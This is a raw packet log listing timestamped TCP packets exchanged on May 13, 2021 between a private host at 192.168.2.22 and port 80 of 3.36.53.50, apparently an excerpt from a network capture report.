May 13, 2021 08:29:35.305120945 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305136919 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305177927 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305177927 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305214882 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305218935 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305252075 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305253029 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305290937 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305289984 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305327892 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305335999 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305376053 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305377960 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305418968 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305443048 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305480003 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305480003 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305516958 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305520058 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305557013 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305557966 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305593014 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305603027 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305641890 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305644989 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305680990 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305682898 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305716991 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305718899 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305757999 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.395343065 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395390987 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395431042 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395468950 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.395478010 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395534992 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.395539045 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395576954 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395581007 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.395615101 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395620108 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.395653009 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395656109 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.395689011 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395719051 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395747900 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395785093 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.395786047 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395808935 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.395822048 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395838976 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.395868063 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395874977 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.395910025 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395931005 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.395946980 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.395986080 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.396008015 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.396023989 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.396044970 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.396060944 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.396080017 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.396099091 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.396117926 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.396136045 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.396155119 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.396183014 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.396195889 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.396224976 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.396250010 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.396261930 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.396286011 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.396320105 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.483995914 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.484234095 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.586450100 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.586508989 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.586743116 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.597917080 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.597970963 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.598135948 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.601991892 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602031946 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602072001 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602108955 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602118969 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602138042 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602144957 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602154970 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602197886 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602235079 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602240086 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602252960 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602272034 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602302074 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602309942 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602333069 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602345943 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602351904 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602385044 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602401972 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602421999 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602442026 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602468967 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602471113 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602510929 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602530003 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602549076 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602576971 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602586985 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602598906 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602627039 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602643967 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602664948 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602694988 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602705002 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602719069 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602744102 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602756977 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602791071 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602806091 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602832079 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602853060 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602869034 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602888107 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602906942 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602922916 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602945089 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602968931 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.602982044 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.602994919 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603019953 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.603039026 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603055954 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.603077888 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603102922 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.603112936 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603144884 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.603164911 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603182077 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.603204966 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603219986 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.603231907 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603256941 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.603276014 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603295088 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.603316069 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603332996 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.603341103 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603369951 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.603389978 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603416920 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.603451014 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603458881 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.603475094 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.603523970 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.691519976 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.691570044 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.691646099 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.691683054 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.691793919 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.691834927 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.691859007 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.691873074 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.691904068 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.691910028 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.691948891 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.691955090 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.691967010 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.691987991 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.691998005 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692034960 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692054033 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692076921 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692097902 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692114115 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692127943 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692152023 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692183971 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692188978 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692198038 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692225933 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692254066 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692262888 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692298889 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692316055 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692327023 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692346096 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692358971 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692387104 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692409039 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692423105 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692450047 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692461014 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692478895 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692498922 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692523003 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692536116 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692550898 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692574978 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692600965 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692611933 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692626953 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692658901 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692672968 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692699909 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692718029 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692737103 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692765951 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692775011 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692787886 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692811966 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692838907 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692848921 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692867994 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692886114 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692898989 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692923069 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692944050 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.692969084 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.692970991 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.693011045 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.693027020 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.693048000 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.693069935 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.693084955 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.693098068 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.693124056 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.693141937 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.693160057 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.693173885 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.693197966 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.693217039 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.693234921 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.693243980 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.693281889 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.693289995 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.693322897 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.693339109 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.693358898 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.693382978 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.693406105 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.693424940 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.693483114 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.879909039 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.879987955 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.879997969 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.880052090 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.891216040 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.891258001 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.891285896 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.891320944 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.896657944 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.896697998 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.896718025 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.896740913 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.896745920 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.896787882 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.896792889 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.896825075 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.896835089 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.896862030 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.896868944 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.896899939 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.896905899 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.896945953 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897217035 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897255898 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897286892 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897293091 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897295952 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897337914 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897363901 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897424936 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897440910 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897463083 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897481918 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897500038 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897519112 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897536993 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897552013 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897577047 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897588968 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897631884 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897635937 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897677898 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897681952 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897723913 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897728920 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897759914 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897766113 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897798061 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897802114 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897835016 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897845030 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897871971 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897881031 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897908926 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.897916079 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897970915 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.897984982 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898031950 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898035049 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898075104 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898078918 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898125887 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898144007 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898184061 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898192883 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898228884 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898231030 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898277044 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898298979 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898335934 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898349047 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898372889 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898380995 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898411036 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898427963 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898446083 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898458004 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898518085 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898534060 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898564100 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898581982 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898622036 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.898627996 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.898664951 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.984786987 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.984874964 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.986788034 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.986829996 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.986860991 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.986876965 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.986896992 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.986918926 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.986924887 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.986955881 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.986967087 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.986996889 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.987006903 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.987047911 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.987442970 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.987488031 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.987520933 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.987525940 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.987551928 CEST	49167	80	192.168.2.22	3.36.53.50
